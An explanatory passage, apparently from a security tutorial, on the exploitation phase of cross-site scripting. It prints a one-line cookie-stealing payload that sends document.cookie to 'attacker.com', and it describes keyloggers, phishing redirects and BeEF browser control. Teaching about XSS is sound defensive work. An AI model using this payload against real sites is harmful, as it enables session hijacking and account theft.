The Exploitation Phase

Once malicious code executes in a victim's browser, the exploitation phase begins. The injected script runs with full access to the page's context, enabling various malicious activities. Cookie theft represents one of the most common exploitation goals. A simple payload like new Image().src='http://attacker.com/steal?cookie='+document.cookie sends the victim's cookies to an attacker-controlled server. With session cookies, attackers can impersonate victims and access their accounts.

Beyond cookie theft, XSS payloads can perform any action the victim could perform on the website. This includes reading sensitive information from the page, modifying page content, submitting forms, making API calls, or redirecting to phishing sites. Sophisticated attacks might inject keyloggers to capture passwords, use the victim's browser as a proxy for further attacks, or exploit browser vulnerabilities for system compromise. The BeEF (Browser Exploitation Framework) demonstrates the extensive control attackers can achieve through XSS, turning victim browsers into remotely controlled zombies.